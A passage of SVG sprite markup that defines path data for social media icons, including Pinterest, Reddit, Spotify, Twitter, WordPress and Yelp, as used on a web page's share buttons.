M8.968,7.178L3.665,4.527C3.569,4.479,3.478,4.456,3.395,4.456 C3.163,4.456,3,4.636,3,4.938v11.45c0,0.306,0.224,0.669,0.498,0.806l4.671,2.335c0.12,0.06,0.234,0.088,0.337,0.088 c0.29,0,0.494-0.225,0.494-0.602V7.231C9,7.208,8.988,7.188,8.968,7.178z"/> </symbol> <symbol id="icon-pinterest" viewBox="0 0 24 24"> <path d="M12.289,2C6.617,2,3.606,5.648,3.606,9.622c0,1.846,1.025,4.146,2.666,4.878c0.25,0.111,0.381,0.063,0.439-0.169 c0.044-0.175,0.267-1.029,0.365-1.428c0.032-0.128,0.017-0.237-0.091-0.362C6.445,11.911,6.01,10.75,6.01,9.668 c0-2.777,2.194-5.464,5.933-5.464c3.23,0,5.49,2.108,5.49,5.122c0,3.407-1.794,5.768-4.13,5.768c-1.291,0-2.257-1.021-1.948-2.277 c0.372-1.495,1.089-3.112,1.089-4.191c0-0.967-0.542-1.775-1.663-1.775c-1.319,0-2.379,1.309-2.379,3.059 c0,1.115,0.394,1.869,0.394,1.869s-1.302,5.279-1.54,6.261c-0.405,1.666,0.053,4.368,0.094,4.604 c0.021,0.126,0.167,0.169,0.25,0.063c0.129-0.165,1.699-2.419,2.142-4.051c0.158-0.59,0.817-2.995,0.817-2.995 c0.43,0.784,1.681,1.446,3.013,1.446c3.963,0,6.822-3.494,6.822-7.833C20.394,5.112,16.849,2,12.289,2"/> </symbol> <symbol id="icon-pocket" viewBox="0 0 24 24"> <path d="M21.927,4.194C21.667,3.48,20.982,3,20.222,3h-0.01h-1.721H3.839C3.092,3,2.411,3.47,2.145,4.17 C2.066,4.378,2.026,4.594,2.026,4.814v6.035l0.069,1.2c0.29,2.73,1.707,5.115,3.899,6.778c0.039,0.03,0.079,0.059,0.119,0.089 l0.025,0.018c1.175,0.859,2.491,1.441,3.91,1.727c0.655,0.132,1.325,0.2,1.991,0.2c0.615,0,1.232-0.057,1.839-0.17 c0.073-0.014,0.145-0.028,0.219-0.044c0.02-0.004,0.042-0.012,0.064-0.023c1.359-0.297,2.621-0.864,3.753-1.691l0.025-0.018 c0.04-0.029,0.08-0.058,0.119-0.089c2.192-1.664,3.609-4.049,3.898-6.778l0.069-1.2V4.814C22.026,4.605,22,4.398,21.927,4.194z M17.692,10.481l-4.704,4.512c-0.266,0.254-0.608,0.382-0.949,0.382c-0.342,0-0.684-0.128-0.949-0.382l-4.705-4.512 C5.838,9.957,5.82,9.089,6.344,8.542c0.524-0.547,1.392-0.565,1.939-0.04l3.756,3.601l3.755-3.601 c0.547-0.524,1.415-0.506,1.939,0.04C18.256,9.089,18.238,9.956,17.692,10.481z"/> </symbol> <symbol id="icon-reddit" viewBox="0 0 24 24"> <path d="M22,11.816c0-1.256-1.021-2.277-2.277-2.277c-0.593,0-1.122,0.24-1.526,0.614c-1.481-0.965-3.455-1.594-5.647-1.69 l1.171-3.702l3.18,0.748c0.008,1.028,0.846,1.862,1.876,1.862c1.035,0,1.877-0.842,1.877-1.878c0-1.035-0.842-1.877-1.877-1.877 c-0.769,0-1.431,0.466-1.72,1.13l-3.508-0.826c-0.203-0.047-0.399,0.067-0.46,0.261l-1.35,4.268 c-2.316,0.038-4.411,0.67-5.97,1.671C5.368,9.765,4.853,9.539,4.277,9.539C3.021,9.539,2,10.56,2,11.816 c0,0.814,0.433,1.523,1.078,1.925c-0.037,0.221-0.061,0.444-0.061,0.672c0,3.292,4.011,5.97,8.941,5.97s8.941-2.678,8.941-5.97 c0-0.214-0.02-0.424-0.053-0.632C21.533,13.39,22,12.661,22,11.816z M18.776,4.394c0.606,0,1.1,0.493,1.1,1.1s-0.493,1.1-1.1,1.1 s-1.1-0.494-1.1-1.1S18.169,4.394,18.776,4.394z M2.777,11.816c0-0.827,0.672-1.5,1.499-1.5c0.313,0,0.598,0.103,0.838,0.269 c-0.851,0.676-1.477,1.479-1.812,2.36C2.983,12.672,2.777,12.27,2.777,11.816z M11.959,19.606c-4.501,0-8.164-2.329-8.164-5.193 S7.457,9.22,11.959,9.22s8.164,2.329,8.164,5.193S16.46,19.606,11.959,19.606z M20.636,13.001c-0.326-0.89-0.948-1.701-1.797-2.384 c0.248-0.186,0.55-0.301,0.883-0.301c0.827,0,1.5,0.673,1.5,1.5C21.223,12.299,20.992,12.727,20.636,13.001z M8.996,14.704 c-0.76,0-1.397-0.616-1.397-1.376c0-0.76,0.637-1.397,1.397-1.397c0.76,0,1.376,0.637,1.376,1.397 C10.372,14.088,9.756,14.704,8.996,14.704z M16.401,13.328c0,0.76-0.616,1.376-1.376,1.376c-0.76,0-1.399-0.616-1.399-1.376 c0-0.76,0.639-1.397,1.399-1.397C15.785,11.931,16.401,12.568,16.401,13.328z M15.229,16.708c0.152,0.152,0.152,0.398,0,0.55 c-0.674,0.674-1.727,1.002-3.219,1.002c-0.004,0-0.007-0.002-0.011-0.002c-0.004,0-0.007,0.002-0.011,0.002 c-1.492,0-2.544-0.328-3.218-1.002c-0.152-0.152-0.152-0.398,0-0.55c0.152-0.152,0.399-0.151,0.55,0 c0.521,0.521,1.394,0.775,2.669,0.775c0.004,0,0.007,0.002,0.011,0.002c0.004,0,0.007-0.002,0.011-0.002 c1.275,0,2.148-0.253,2.669-0.775C14.831,16.556,15.078,16.556,15.229,16.708z"/> </symbol> <symbol id="icon-skype" viewBox="0 0 24 24"> <path d="M10.113,2.699c0.033-0.006,0.067-0.013,0.1-0.02c0.033,0.017,0.066,0.033,0.098,0.051L10.113,2.699z M2.72,10.223 c-0.006,0.034-0.011,0.069-0.017,0.103c0.018,0.032,0.033,0.064,0.051,0.095L2.72,10.223z M21.275,13.771 c0.007-0.035,0.011-0.071,0.018-0.106c-0.018-0.031-0.033-0.064-0.052-0.095L21.275,13.771z M13.563,21.199 c0.032,0.019,0.065,0.035,0.096,0.053c0.036-0.006,0.071-0.011,0.105-0.017L13.563,21.199z M22,16.386 c0,1.494-0.581,2.898-1.637,3.953c-1.056,1.057-2.459,1.637-3.953,1.637c-0.967,0-1.914-0.251-2.75-0.725 c0.036-0.006,0.071-0.011,0.105-0.017l-0.202-0.035c0.032,0.019,0.065,0.035,0.096,0.053c-0.543,0.096-1.099,0.147-1.654,0.147 c-1.275,0-2.512-0.25-3.676-0.743c-1.125-0.474-2.135-1.156-3.002-2.023c-0.867-0.867-1.548-1.877-2.023-3.002 c-0.493-1.164-0.743-2.401-0.743-3.676c0-0.546,0.049-1.093,0.142-1.628c0.018,0.032,0.033,0.064,0.051,0.095L2.72,10.223 c-0.006,0.034-0.011,0.069-0.017,0.103C2.244,9.5,2,8.566,2,7.615c0-1.493,0.582-2.898,1.637-3.953 c1.056-1.056,2.46-1.638,3.953-1.638c0.915,0,1.818,0.228,2.622,0.655c-0.033,0.007-0.067,0.013-0.1,0.02l0.199,0.031 c-0.032-0.018-0.066-0.034-0.098-0.051c0.002,0,0.003-0.001,0.004-0.001c0.586-0.112,1.187-0.169,1.788-0.169 c1.275,0,2.512,0.249,3.676,0.742c1.124,0.476,2.135,1.156,3.002,2.024c0.868,0.867,1.548,1.877,2.024,3.002 c0.493,1.164,0.743,2.401,0.743,3.676c0,0.575-0.054,1.15-0.157,1.712c-0.018-0.031-0.033-0.064-0.052-0.095l0.034,0.201 c0.007-0.035,0.011-0.071,0.018-0.106C21.754,14.494,22,15.432,22,16.386z M16.817,14.138c0-1.331-0.613-2.743-3.033-3.282 l-2.209-0.49c-0.84-0.192-1.807-0.444-1.807-1.237c0-0.794,0.679-1.348,1.903-1.348c2.468,0,2.243,1.696,3.468,1.696 c0.645,0,1.209-0.379,1.209-1.031c0-1.521-2.435-2.663-4.5-2.663c-2.242,0-4.63,0.952-4.63,3.488c0,1.221,0.436,2.521,2.839,3.123 l2.984,0.745c0.903,0.223,1.129,0.731,1.129,1.189c0,0.762-0.758,1.507-2.129,1.507c-2.679,0-2.307-2.062-3.743-2.062 c-0.645,0-1.113,0.444-1.113,1.078c0,1.236,1.501,2.886,4.856,2.886C15.236,17.737,16.817,16.199,16.817,14.138z"/> </symbol> <symbol id="icon-slideshare" viewBox="0 0 24 24"> <path d="M11.738,10.232a2.142,2.142,0,0,1-.721,1.619,2.556,2.556,0,0,1-3.464,0,2.183,2.183,0,0,1,0-3.243,2.572,2.572,0,0,1,3.464,0A2.136,2.136,0,0,1,11.738,10.232Zm5.7,0a2.15,2.15,0,0,1-.715,1.619,2.563,2.563,0,0,1-3.469,0,2.183,2.183,0,0,1,0-3.243,2.58,2.58,0,0,1,3.469,0A2.144,2.144,0,0,1,17.439,10.232Zm2.555,2.045V4.7a2.128,2.128,0,0,0-.363-1.4,1.614,1.614,0,0,0-1.261-.415H5.742a1.656,1.656,0,0,0-1.278.386A2.246,2.246,0,0,0,4.129,4.7v7.643a8.212,8.212,0,0,0,1,.454q.516.193.92.318a6.847,6.847,0,0,0,.92.21q.516.085.806.125a6.615,6.615,0,0,0,.795.045l.665.006q.16,0,.642-.023t.506-.023a1.438,1.438,0,0,1,1.079.307,1.134,1.134,0,0,0,.114.1,7.215,7.215,0,0,0,.693.579q.079-1.033,1.34-.988.057,0,.415.017l.488.023q.13.006.517.011t.6-.011l.619-.051a5.419,5.419,0,0,0,.693-.1l.7-.153a5.353,5.353,0,0,0,.761-.221q.345-.131.766-.307a8.727,8.727,0,0,0,.818-.392Zm1.851-.057a10.4,10.4,0,0,1-4.225,2.862,6.5,6.5,0,0,1-.261,5.281,3.524,3.524,0,0,1-2.078,1.681,2.452,2.452,0,0,1-2.067-.17,1.915,1.915,0,0,1-.931-1.863l-.011-3.7V16.3l-.279-.068q-.188-.045-.267-.057l-.011,3.839a1.9,1.9,0,0,1-.943,1.863,2.481,2.481,0,0,1-2.078.17,3.519,3.519,0,0,1-2.067-1.7,6.546,6.546,0,0,1-.25-5.258A10.4,10.4,0,0,1,2.152,12.22a.56.56,0,0,1-.045-.715q.238-.3.681.011l.125.079a.767.767,0,0,1,.125.091V3.8a1.987,1.987,0,0,1,.534-1.4,1.7,1.7,0,0,1,1.295-.579H19.141a1.7,1.7,0,0,1,1.295.579,1.985,1.985,0,0,1,.534,1.4v7.882l.238-.17q.443-.307.681-.011a.56.56,0,0,1-.045.715Z"/> </symbol> <symbol id="icon-snapchat" viewBox="0 0 24 24"> <path d="M12.065,2a5.526,5.526,0,0,1,3.132.892A5.854,5.854,0,0,1,17.326,5.4a5.821,5.821,0,0,1,.351,2.33q0,.612-.117,2.487a.809.809,0,0,0,.365.091,1.93,1.93,0,0,0,.664-.176,1.93,1.93,0,0,1,.664-.176,1.3,1.3,0,0,1,.729.234.7.7,0,0,1,.351.6.839.839,0,0,1-.41.7,2.732,2.732,0,0,1-.9.41,3.192,3.192,0,0,0-.9.378.728.728,0,0,0-.41.618,1.575,1.575,0,0,0,.156.56,6.9,6.9,0,0,0,1.334,1.953,5.6,5.6,0,0,0,1.881,1.315,5.875,5.875,0,0,0,1.042.3.42.42,0,0,1,.365.456q0,.911-2.852,1.341a1.379,1.379,0,0,0-.143.507,1.8,1.8,0,0,1-.182.605.451.451,0,0,1-.429.241,5.878,5.878,0,0,1-.807-.085,5.917,5.917,0,0,0-.833-.085,4.217,4.217,0,0,0-.807.065,2.42,2.42,0,0,0-.82.293,6.682,6.682,0,0,0-.755.5q-.351.267-.755.527a3.886,3.886,0,0,1-.989.436A4.471,4.471,0,0,1,11.831,22a4.307,4.307,0,0,1-1.256-.176,3.784,3.784,0,0,1-.976-.436q-.4-.26-.749-.527a6.682,6.682,0,0,0-.755-.5,2.422,2.422,0,0,0-.807-.293,4.432,4.432,0,0,0-.82-.065,5.089,5.089,0,0,0-.853.1,5,5,0,0,1-.762.1.474.474,0,0,1-.456-.241,1.819,1.819,0,0,1-.182-.618,1.411,1.411,0,0,0-.143-.521q-2.852-.429-2.852-1.341a.42.42,0,0,1,.365-.456,5.793,5.793,0,0,0,1.042-.3,5.524,5.524,0,0,0,1.881-1.315,6.789,6.789,0,0,0,1.334-1.953A1.575,1.575,0,0,0,6,12.9a.728.728,0,0,0-.41-.618,3.323,3.323,0,0,0-.9-.384,2.912,2.912,0,0,1-.9-.41.814.814,0,0,1-.41-.684.71.71,0,0,1,.338-.593,1.208,1.208,0,0,1,.716-.241,1.976,1.976,0,0,1,.625.169,2.008,2.008,0,0,0,.69.169.919.919,0,0,0,.416-.091q-.117-1.849-.117-2.474A5.861,5.861,0,0,1,6.385,5.4,5.516,5.516,0,0,1,8.625,2.819,7.075,7.075,0,0,1,12.062,2Z"/> </symbol> <symbol id="icon-soundcloud" viewBox="0 0 24 24"> <path d="M8.9,16.1L9,14L8.9,9.5c0-0.1,0-0.1-0.1-0.1c0,0-0.1-0.1-0.1-0.1c-0.1,0-0.1,0-0.1,0.1c0,0-0.1,0.1-0.1,0.1L8.3,14l0.1,2.1 c0,0.1,0,0.1,0.1,0.1c0,0,0.1,0.1,0.1,0.1C8.8,16.3,8.9,16.3,8.9,16.1z M11.4,15.9l0.1-1.8L11.4,9c0-0.1,0-0.2-0.1-0.2 c0,0-0.1,0-0.1,0s-0.1,0-0.1,0c-0.1,0-0.1,0.1-0.1,0.2l0,0.1l-0.1,5c0,0,0,0.7,0.1,2v0c0,0.1,0,0.1,0.1,0.1c0.1,0.1,0.1,0.1,0.2,0.1 c0.1,0,0.1,0,0.2-0.1c0.1,0,0.1-0.1,0.1-0.2L11.4,15.9z M2.4,12.9L2.5,14l-0.2,1.1c0,0.1,0,0.1-0.1,0.1c0,0-0.1,0-0.1-0.1L2.1,14 l0.1-1.1C2.2,12.9,2.3,12.9,2.4,12.9C2.3,12.9,2.4,12.9,2.4,12.9z M3.1,12.2L3.3,14l-0.2,1.8c0,0.1,0,0.1-0.1,0.1 c-0.1,0-0.1,0-0.1-0.1L2.8,14L3,12.2C3,12.2,3,12.2,3.1,12.2C3.1,12.2,3.1,12.2,3.1,12.2z M3.9,11.9L4.1,14l-0.2,2.1 c0,0.1,0,0.1-0.1,0.1c-0.1,0-0.1,0-0.1-0.1L3.5,14l0.2-2.1c0-0.1,0-0.1,0.1-0.1C3.9,11.8,3.9,11.8,3.9,11.9z M4.7,11.9L4.9,14 l-0.2,2.1c0,0.1-0.1,0.1-0.1,0.1c-0.1,0-0.1,0-0.1-0.1L4.3,14l0.2-2.2c0-0.1,0-0.1,0.1-0.1C4.7,11.7,4.7,11.8,4.7,11.9z M5.6,12 l0.2,2l-0.2,2.1c0,0.1-0.1,0.1-0.1,0.1c0,0-0.1,0-0.1,0c0,0,0-0.1,0-0.1L5.1,14l0.2-2c0,0,0-0.1,0-0.1s0.1,0,0.1,0 C5.5,11.9,5.5,11.9,5.6,12L5.6,12z M6.4,10.7L6.6,14l-0.2,2.1c0,0,0,0.1,0,0.1c0,0-0.1,0-0.1,0c-0.1,0-0.1-0.1-0.2-0.2L5.9,14 l0.2-3.3c0-0.1,0.1-0.2,0.2-0.2c0,0,0.1,0,0.1,0C6.4,10.7,6.4,10.7,6.4,10.7z M7.2,10l0.2,4.1l-0.2,2.1c0,0,0,0.1,0,0.1 c0,0-0.1,0-0.1,0c-0.1,0-0.2-0.1-0.2-0.2l-0.1-2.1L6.8,10c0-0.1,0.1-0.2,0.2-0.2c0,0,0.1,0,0.1,0S7.2,9.9,7.2,10z M8,9.6L8.2,14 L8,16.1c0,0.1-0.1,0.2-0.2,0.2c-0.1,0-0.2-0.1-0.2-0.2L7.5,14l0.1-4.4c0-0.1,0-0.1,0.1-0.1c0,0,0.1-0.1,0.1-0.1c0.1,0,0.1,0,0.1,0.1 C8,9.6,8,9.6,8,9.6z M11.4,16.1L11.4,16.1L11.4,16.1z M9.7,9.6L9.8,14l-0.1,2.1c0,0.1,0,0.1-0.1,0.2s-0.1,0.1-0.2,0.1 c-0.1,0-0.1,0-0.1-0.1s-0.1-0.1-0.1-0.2L9.2,14l0.1-4.4c0-0.1,0-0.1,0.1-0.2s0.1-0.1,0.2-0.1c0.1,0,0.1,0,0.2,0.1S9.7,9.5,9.7,9.6 L9.7,9.6z M10.6,9.8l0.1,4.3l-0.1,2c0,0.1,0,0.1-0.1,0.2c0,0-0.1,0.1-0.2,0.1c-0.1,0-0.1,0-0.2-0.1c0,0-0.1-0.1-0.1-0.2L10,14 l0.1-4.3c0-0.1,0-0.1,0.1-0.2c0,0,0.1-0.1,0.2-0.1c0.1,0,0.1,0,0.2,0.1S10.6,9.7,10.6,9.8z M12.4,14l-0.1,2c0,0.1,0,0.1-0.1,0.2 c-0.1,0.1-0.1,0.1-0.2,0.1c-0.1,0-0.1,0-0.2-0.1c-0.1-0.1-0.1-0.1-0.1-0.2l-0.1-1l-0.1-1l0.1-5.5v0c0-0.1,0-0.2,0.1-0.2 c0.1,0,0.1-0.1,0.2-0.1c0,0,0.1,0,0.1,0c0.1,0,0.1,0.1,0.1,0.2L12.4,14z M22.1,13.9c0,0.7-0.2,1.3-0.7,1.7c-0.5,0.5-1.1,0.7-1.7,0.7 h-6.8c-0.1,0-0.1,0-0.2-0.1c-0.1-0.1-0.1-0.1-0.1-0.2V8.2c0-0.1,0.1-0.2,0.2-0.3c0.5-0.2,1-0.3,1.6-0.3c1.1,0,2.1,0.4,2.9,1.1 c0.8,0.8,1.3,1.7,1.4,2.8c0.3-0.1,0.6-0.2,1-0.2c0.7,0,1.3,0.2,1.7,0.7C21.8,12.6,22.1,13.2,22.1,13.9L22.1,13.9z"/> </symbol> <symbol id="icon-spotify" viewBox="0 0 24 24"> <path d="M12,2C6.477,2,2,6.477,2,12c0,5.523,4.477,10,10,10c5.523,0,10-4.477,10-10C22,6.477,17.523,2,12,2 M16.586,16.424 c-0.18,0.295-0.563,0.387-0.857,0.207c-2.348-1.435-5.304-1.76-8.785-0.964c-0.335,0.077-0.67-0.133-0.746-0.469 c-0.077-0.335,0.132-0.67,0.469-0.746c3.809-0.871,7.077-0.496,9.713,1.115C16.673,15.746,16.766,16.13,16.586,16.424 M17.81,13.7 c-0.226,0.367-0.706,0.482-1.072,0.257c-2.687-1.652-6.785-2.131-9.965-1.166C6.36,12.917,5.925,12.684,5.8,12.273 C5.675,11.86,5.908,11.425,6.32,11.3c3.632-1.102,8.147-0.568,11.234,1.328C17.92,12.854,18.035,13.335,17.81,13.7 M17.915,10.865 c-3.223-1.914-8.54-2.09-11.618-1.156C5.804,9.859,5.281,9.58,5.131,9.086C4.982,8.591,5.26,8.069,5.755,7.919 c3.532-1.072,9.404-0.865,13.115,1.338c0.445,0.264,0.59,0.838,0.327,1.282C18.933,10.983,18.359,11.129,17.915,10.865"/> </symbol> <symbol id="icon-stackoverflow" viewBox="0 0 24 24"> <path d="m 17.817128,20.228605 v -5.337217 h 1.771431 V 22 H 3.6 v -7.108612 h 1.771401 v 5.337217 z" /> <path d="m 7.3267845,14.385359 8.6959295,1.817316 0.368168,-1.748385 -8.6959318,-1.817319 z m 1.1503197,-4.140944 8.0517968,3.749872 0.73617,-1.610385 -8.0518344,-3.7728517 z m 2.2315078,-3.9569154 6.832405,5.6822664 1.12738,-1.357316 -6.832576,-5.6822636 z m 4.417,-4.2099019 -1.426448,1.0581864 5.291191,7.1316119 1.426412,-1.0582745 z M 7.1427296,18.434189 h 8.8799844 v -1.7713 H 7.1427296 Z" /> <path d="m 17.817128,20.228605 v -5.337217 h 1.771431 V 22 H 3.6 v -7.108612 h 1.771401 v 5.337217 z" /> <path d="m 7.3267845,14.385359 8.6959295,1.817316 0.368168,-1.748385 -8.6959318,-1.817319 z m 1.1503197,-4.140944 8.0517968,3.749872 0.73617,-1.610385 -8.0518344,-3.7728517 z m 2.2315078,-3.9569154 6.832405,5.6822664 1.12738,-1.357316 -6.832576,-5.6822636 z m 4.417,-4.2099019 -1.426448,1.0581864 5.291191,7.1316119 1.426412,-1.0582745 z M 7.1427296,18.434189 h 8.8799844 v -1.7713 H 7.1427296 Z" /> </symbol> <symbol id="icon-stumbleupon" viewBox="0 0 24 24"> <path d="M12,4.294c-2.469,0-4.471,2.002-4.471,4.471v6.353c0,0.585-0.474,1.059-1.059,1.059c-0.585,0-1.059-0.474-1.059-1.059 v-2.824H2v2.941c0,2.469,2.002,4.471,4.471,4.471c2.469,0,4.471-2.002,4.471-4.471V8.765c0-0.585,0.474-1.059,1.059-1.059 s1.059,0.474,1.059,1.059v1.294l1.412,0.647l2-0.647V8.765C16.471,6.296,14.469,4.294,12,4.294z M13.059,12.353v2.882 c0,2.469,2.002,4.471,4.471,4.471S22,17.704,22,15.235v-2.824h-3.412v2.824c0,0.585-0.474,1.059-1.059,1.059 c-0.585,0-1.059-0.474-1.059-1.059v-2.882l-2,0.647L13.059,12.353z"/> </symbol> <symbol id="icon-tumblr" viewBox="0 0 24 24"> <path d="M16.749,17.396c-0.357,0.17-1.041,0.319-1.551,0.332c-1.539,0.041-1.837-1.081-1.85-1.896V9.847h3.861V6.937h-3.847V2.039 c0,0-2.77,0-2.817,0c-0.046,0-0.127,0.041-0.138,0.144c-0.165,1.499-0.867,4.13-3.783,5.181v2.484h1.945v6.282 c0,2.151,1.587,5.206,5.775,5.135c1.413-0.024,2.982-0.616,3.329-1.126L16.749,17.396z"/> </symbol> <symbol id="icon-twitch" viewBox="0 0 24 24"> <path d="M16.499,8.089h-1.636v4.91h1.636V8.089z M12,8.089h-1.637v4.91H12V8.089z M4.228,3.178L3,6.451v13.092h4.499V22h2.456 l2.454-2.456h3.681L21,14.636V3.178H4.228z M19.364,13.816l-2.864,2.865H12l-2.453,2.453V16.68H5.863V4.814h13.501V13.816z"/> </symbol> <symbol id="icon-twitter" viewBox="0 0 24 24"> <path d="M22.23,5.924c-0.736,0.326-1.527,0.547-2.357,0.646c0.847-0.508,1.498-1.312,1.804-2.27 c-0.793,0.47-1.671,0.812-2.606,0.996C18.324,4.498,17.257,4,16.077,4c-2.266,0-4.103,1.837-4.103,4.103 c0,0.322,0.036,0.635,0.106,0.935C8.67,8.867,5.647,7.234,3.623,4.751C3.27,5.357,3.067,6.062,3.067,6.814 c0,1.424,0.724,2.679,1.825,3.415c-0.673-0.021-1.305-0.206-1.859-0.513c0,0.017,0,0.034,0,0.052c0,1.988,1.414,3.647,3.292,4.023 c-0.344,0.094-0.707,0.144-1.081,0.144c-0.264,0-0.521-0.026-0.772-0.074c0.522,1.63,2.038,2.816,3.833,2.85 c-1.404,1.1-3.174,1.756-5.096,1.756c-0.331,0-0.658-0.019-0.979-0.057c1.816,1.164,3.973,1.843,6.29,1.843 c7.547,0,11.675-6.252,11.675-11.675c0-0.178-0.004-0.355-0.012-0.531C20.985,7.47,21.68,6.747,22.23,5.924z"/> </symbol> <symbol id="icon-vimeo" viewBox="0 0 24 24"> <path d="M22.396,7.164c-0.093,2.026-1.507,4.799-4.245,8.32C15.322,19.161,12.928,21,10.97,21c-1.214,0-2.24-1.119-3.079-3.359 c-0.56-2.053-1.119-4.106-1.68-6.159C5.588,9.243,4.921,8.122,4.206,8.122c-0.156,0-0.701,0.328-1.634,0.98L1.594,7.841 c1.027-0.902,2.04-1.805,3.037-2.708C6.001,3.95,7.03,3.327,7.715,3.264c1.619-0.156,2.616,0.951,2.99,3.321 c0.404,2.557,0.685,4.147,0.841,4.769c0.467,2.121,0.981,3.181,1.542,3.181c0.435,0,1.09-0.688,1.963-2.065 c0.871-1.376,1.338-2.422,1.401-3.142c0.125-1.187-0.343-1.782-1.401-1.782c-0.498,0-1.012,0.115-1.541,0.341 c1.023-3.35,2.977-4.977,5.862-4.884C21.511,3.066,22.52,4.453,22.396,7.164z"/> </symbol> <symbol id="icon-vk" viewBox="0 0 24 24"> <path d="M22,7.1c0.2,0.4-0.4,1.5-1.6,3.1c-0.2,0.2-0.4,0.5-0.7,0.9c-0.5,0.7-0.9,1.1-0.9,1.4c-0.1,0.3-0.1,0.6,0.1,0.8 c0.1,0.1,0.4,0.4,0.8,0.9h0l0,0c1,0.9,1.6,1.7,2,2.3c0,0,0,0.1,0.1,0.1c0,0.1,0,0.1,0.1,0.3c0,0.1,0,0.2,0,0.4 c0,0.1-0.1,0.2-0.3,0.3c-0.1,0.1-0.4,0.1-0.6,0.1l-2.7,0c-0.2,0-0.4,0-0.6-0.1c-0.2-0.1-0.4-0.1-0.5-0.2l-0.2-0.1 c-0.2-0.1-0.5-0.4-0.7-0.7s-0.5-0.6-0.7-0.8c-0.2-0.2-0.4-0.4-0.6-0.6C14.8,15,14.6,15,14.4,15c0,0,0,0-0.1,0c0,0-0.1,0.1-0.2,0.2 c-0.1,0.1-0.2,0.2-0.2,0.3c-0.1,0.1-0.1,0.3-0.2,0.5c-0.1,0.2-0.1,0.5-0.1,0.8c0,0.1,0,0.2,0,0.3c0,0.1-0.1,0.2-0.1,0.2l0,0.1 c-0.1,0.1-0.3,0.2-0.6,0.2h-1.2c-0.5,0-1,0-1.5-0.2c-0.5-0.1-1-0.3-1.4-0.6s-0.7-0.5-1.1-0.7s-0.6-0.4-0.7-0.6l-0.3-0.3 c-0.1-0.1-0.2-0.2-0.3-0.3s-0.4-0.5-0.7-0.9s-0.7-1-1.1-1.6c-0.4-0.6-0.8-1.3-1.3-2.2C2.9,9.4,2.5,8.5,2.1,7.5C2,7.4,2,7.3,2,7.2 c0-0.1,0-0.1,0-0.2l0-0.1c0.1-0.1,0.3-0.2,0.6-0.2l2.9,0c0.1,0,0.2,0,0.2,0.1S5.9,6.9,5.9,7L6,7c0.1,0.1,0.2,0.2,0.3,0.3 C6.4,7.7,6.5,8,6.7,8.4C6.9,8.8,7,9,7.1,9.2l0.2,0.3c0.2,0.4,0.4,0.8,0.6,1.1c0.2,0.3,0.4,0.5,0.5,0.7s0.3,0.3,0.4,0.4 c0.1,0.1,0.3,0.1,0.4,0.1c0.1,0,0.2,0,0.3-0.1c0,0,0,0,0.1-0.1c0,0,0.1-0.1,0.1-0.2c0.1-0.1,0.1-0.3,0.1-0.5c0-0.2,0.1-0.5,0.1-0.8 c0-0.4,0-0.8,0-1.3c0-0.3,0-0.5-0.1-0.8c0-0.2-0.1-0.4-0.1-0.5L9.6,7.6C9.4,7.3,9.1,7.2,8.7,7.1C8.6,7.1,8.6,7,8.7,6.9 C8.9,6.7,9,6.6,9.1,6.5c0.4-0.2,1.2-0.3,2.5-0.3c0.6,0,1,0.1,1.4,0.1c0.1,0,0.3,0.1,0.3,0.1c0.1,0.1,0.2,0.1,0.2,0.3 c0,0.1,0.1,0.2,0.1,0.3s0,0.3,0,0.5c0,0.2,0,0.4,0,0.6c0,0.2,0,0.4,0,0.7c0,0.3,0,0.6,0,0.9c0,0.1,0,0.2,0,0.4c0,0.2,0,0.4,0,0.5 c0,0.1,0,0.3,0,0.4s0.1,0.3,0.1,0.4c0.1,0.1,0.1,0.2,0.2,0.3c0.1,0,0.1,0,0.2,0c0.1,0,0.2,0,0.3-0.1c0.1-0.1,0.2-0.2,0.4-0.4 s0.3-0.4,0.5-0.7c0.2-0.3,0.5-0.7,0.7-1.1c0.4-0.7,0.8-1.5,1.1-2.3c0-0.1,0.1-0.1,0.1-0.2c0-0.1,0.1-0.1,0.1-0.1l0,0l0.1,0 c0,0,0,0,0.1,0s0.2,0,0.2,0l3,0c0.3,0,0.5,0,0.7,0S21.9,7,21.9,7L22,7.1z"/> </symbol> <symbol id="icon-wordpress" viewBox="0 0 24 24"> <path d="M12.158,12.786L9.46,20.625c0.806,0.237,1.657,0.366,2.54,0.366c1.047,0,2.051-0.181,2.986-0.51 c-0.024-0.038-0.046-0.079-0.065-0.124L12.158,12.786z M3.009,12c0,3.559,2.068,6.634,5.067,8.092L3.788,8.341 C3.289,9.459,3.009,10.696,3.009,12z M18.069,11.546c0-1.112-0.399-1.881-0.741-2.48c-0.456-0.741-0.883-1.368-0.883-2.109 c0-0.826,0.627-1.596,1.51-1.596c0.04,0,0.078,0.005,0.116,0.007C16.472,3.904,14.34,3.009,12,3.009 c-3.141,0-5.904,1.612-7.512,4.052c0.211,0.007,0.41,0.011,0.579,0.011c0.94,0,2.396-0.114,2.396-0.114 C7.947,6.93,8.004,7.642,7.52,7.699c0,0-0.487,0.057-1.029,0.085l3.274,9.739l1.968-5.901l-1.401-3.838 C9.848,7.756,9.389,7.699,9.389,7.699C8.904,7.67,8.961,6.93,9.446,6.958c0,0,1.484,0.114,2.368,0.114 c0.94,0,2.397-0.114,2.397-0.114c0.485-0.028,0.542,0.684,0.057,0.741c0,0-0.488,0.057-1.029,0.085l3.249,9.665l0.897-2.996 C17.841,13.284,18.069,12.316,18.069,11.546z M19.889,7.686c0.039,0.286,0.06,0.593,0.06,0.924c0,0.912-0.171,1.938-0.684,3.22 l-2.746,7.94c2.673-1.558,4.47-4.454,4.47-7.771C20.991,10.436,20.591,8.967,19.889,7.686z M12,22C6.486,22,2,17.514,2,12 C2,6.486,6.486,2,12,2c5.514,0,10,4.486,10,10C22,17.514,17.514,22,12,22z"/> </symbol> <symbol id="icon-yelp" viewBox="0 0 24 24"> <path d="M12.271,16.718v1.417q-.011,3.257-.067,3.4a.707.707,0,0,1-.569.446,4.637,4.637,0,0,1-2.024-.424A4.609,4.609,0,0,1,7.8,20.565a.844.844,0,0,1-.19-.4.692.692,0,0,1,.044-.29,3.181,3.181,0,0,1,.379-.524q.335-.412,2.019-2.409.011,0,.669-.781a.757.757,0,0,1,.44-.274.965.965,0,0,1,.552.039.945.945,0,0,1,.418.324.732.732,0,0,1,.139.468Zm-1.662-2.8a.783.783,0,0,1-.58.781l-1.339.435q-3.067.981-3.257.981a.711.711,0,0,1-.6-.4,2.636,2.636,0,0,1-.19-.836,9.134,9.134,0,0,1,.011-1.857,3.559,3.559,0,0,1,.335-1.389.659.659,0,0,1,.625-.357,22.629,22.629,0,0,1,2.253.859q.781.324,1.283.524l.937.379a.771.771,0,0,1,.4.34A.982.982,0,0,1,10.609,13.917Zm9.213,3.313a